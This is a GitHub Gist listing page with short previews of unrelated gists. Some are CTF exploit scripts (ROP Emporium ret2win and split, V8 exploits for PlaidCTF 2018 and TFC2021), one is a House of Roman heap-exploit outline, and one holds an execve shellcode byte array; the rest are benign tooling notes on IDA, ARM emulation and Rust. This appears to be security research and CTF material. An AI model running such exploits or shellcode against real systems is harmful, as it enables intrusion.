- Disclamair
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
zachriggle
/ win.py
Created
September 1, 2017 20:35
Example Exploit for ROP Emporium's ret2win Challenge Raw
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # Set up pwntools to work with this binary | |
| elf = context.binary = ELF('ret2win') | |
| # Enable verbose logging so we can see exactly what is being sent. | |
| context.log_level = 'debug' | |
| # Print out the target address | |
| info("%#x target", elf.symbols.ret2win) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # Set up pwntools to work with this binary | |
| elf = context.binary = ELF('split') | |
| # We need to invoke system("cat flag"), which requires knowing the | |
| # location of both the function 'system' as well as the string 'cat flag'. | |
| system = elf.symbols.system | |
| cat_flag = elf.search("cat flag").next() |
romanking98
/ House_of_Roman.md
Last active
July 22, 2024 12:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
cmatthewbrooks
/ hello_world_plugin.py
Created
April 25, 2019 12:41
The simplest possible IDA plugin with multiple actions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################## | |
| # | |
| # Name: hello_world_plugin.py | |
| # Auth: @cmatthewbrooks | |
| # Desc: A test plugin to learn how to make these work; Specifically, how to | |
| # have multiple actions within the same plugin. | |
| # | |
| # In plain English, IDA will look for the PLUGIN_ENTRY function which | |
| # should return a plugin object. This object can contain all the | |
| # functionality itself, or it can have multiple actions. |
ag88
/ ARMDebianUbuntu.md
Last active
April 13, 2023 12:11
— forked from Liryna/ARMDebianUbuntu.md
Emulating ARM on Debian/Ubuntu
You might want to read this to get an introduction to armel vs armhf.
If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.
First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on linux
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
jimmychu0807
/ string-conversion.rs
Created
November 21, 2019 10:20
Conversion between String, str, Vec<u8>, Vec<char> in Rust
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use std::str; | |
| fn main() { | |
| // -- FROM: vec of chars -- | |
| let src1: Vec<char> = vec!['j','{','"','i','m','m','y','"','}']; | |
| // to String | |
| let string1: String = src1.iter().collect::<String>(); | |
| // to str | |
| let str1: &str = &src1.iter().collect::<String>(); | |
| // to vec of byte |
icecr4ck
/ idapython_ctree.md
Last active
November 14, 2024 07:32
Notes on CTREE usage with IDAPython
The CTREE is built from the optimized microcode (maturity at CMAT_FINAL), it represents an AST-like tree with C statements and expressions. It can be printed as C code.
vngkv123
/ TFC2021-Chrome-V8.mjs
Last active
November 5, 2021 06:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import * as module from "1.mjs"; | |
| /* | |
| => 1.mjs | |
| export let x = {}; | |
| export let y = {}; | |
| export let z = {}; | |
| */ | |
| var f64 = new Float64Array(1); |
OlderNewer